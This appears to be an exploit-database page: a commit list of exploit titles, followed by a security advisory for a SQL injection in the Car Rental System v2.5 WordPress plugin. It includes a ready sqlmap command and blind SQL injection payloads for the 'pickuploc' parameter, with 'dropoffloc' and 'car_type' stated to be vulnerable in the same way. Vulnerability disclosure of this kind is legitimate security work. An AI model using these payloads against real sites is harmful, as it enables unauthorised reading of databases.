9d143a6b42
22 changes to exploits/shellcodes Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection Wikidforum 2.20 - Cross-Site Scripting WAGO 750-881 01.09.18 - Cross-Site Scripting E-Registrasi Pencak Silat 18.10 - 'id_partai' SQL Injection jQuery-File-Upload 9.22.0 - Arbitrary File Upload Phoenix Contact WebVisit 6.40.00 - Password Disclosure HaPe PKH 1.1 - 'id' SQL Injection LUYA CMS 1.0.12 - Cross-Site Scripting Phoenix Contact WebVisit 2985725 - Authentication Bypass HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin) CAMALEON CMS 2.4 - Cross-Site Scripting HaPe PKH 1.1 - Arbitrary File Upload SugarCRM 6.5.26 - Cross-Site Scripting FluxBB < 1.5.6 - SQL Injection
50 lines
No EOL
1.8 KiB
Text
50 lines
No EOL
1.8 KiB
Text
# Exploit Title: Car Rental System v2.5
|
|
# Date: 28/03/2017
|
|
# Exploit Author: TAD GROUP
|
|
# Vendor Homepage: https://www.bestsoftinc.com/
|
|
# Software Link: https://www.bestsoftinc.com/car-rental-system.html
|
|
# Version: 2.5
|
|
# Contact: info[at]tad.group
|
|
# Website: https://tad.group
|
|
# Category: Web Application Exploits
|
|
|
|
1. Description
|
|
|
|
An unescaped parameter was found in Car Rental System v2.5 (WP plugin). An attacker can exploit this vulnerability to read from the database.
|
|
The POST parameters 'pickuploc', 'dropoffloc', and 'car_type' are vulnerable.
|
|
|
|
2. Proof of concept
|
|
|
|
sqlmap -u "http://server/wp-car/" —data="pickuploc=2&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=" --dbs --threads=5 --random-agent
|
|
|
|
Parameter: pickuploc (POST)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: pickuploc=2 AND 3834=3834&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind
|
|
Payload: pickuploc=2 AND SLEEP(5)&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
|
|
|
|
The same is applicable for 'dropoffloc' and 'car_type' parameters
|
|
|
|
|
|
3. Attack outcome:
|
|
|
|
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
|
|
|
|
4. Impact
|
|
|
|
Critical
|
|
|
|
5. Affected versions
|
|
|
|
<= 2.5
|
|
|
|
6. Disclosure timeline
|
|
|
|
13-Mar-2017 - found the vulnerability
|
|
13-Mar-2017 - informed the developer
|
|
28-Mar-2017 - release date of this security advisory
|
|
|
|
Not fixed at the date of submitting this exploit. |